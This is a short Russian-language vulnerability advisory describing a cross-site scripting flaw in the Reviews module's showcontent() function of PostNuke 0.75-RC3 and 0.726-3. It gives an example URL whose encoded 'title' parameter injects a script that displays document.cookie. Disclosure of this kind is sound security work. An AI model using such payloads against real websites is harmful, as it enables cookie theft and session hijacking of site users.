Программа: PostNuke 0.75-RC3, 0.726-3 

Уязвимость в PostNuke в Reviews модуле в функции showcontent() озволяет удаленному пользователю выполнить XSS нападение. 

Пример: 

http://localhost/html/modules.php?op=modload&name= Reviews&file=index&req=showcontent&id=1&title=
%253cscript>alert%2528document.cookie); %253c/script

Оставить мнение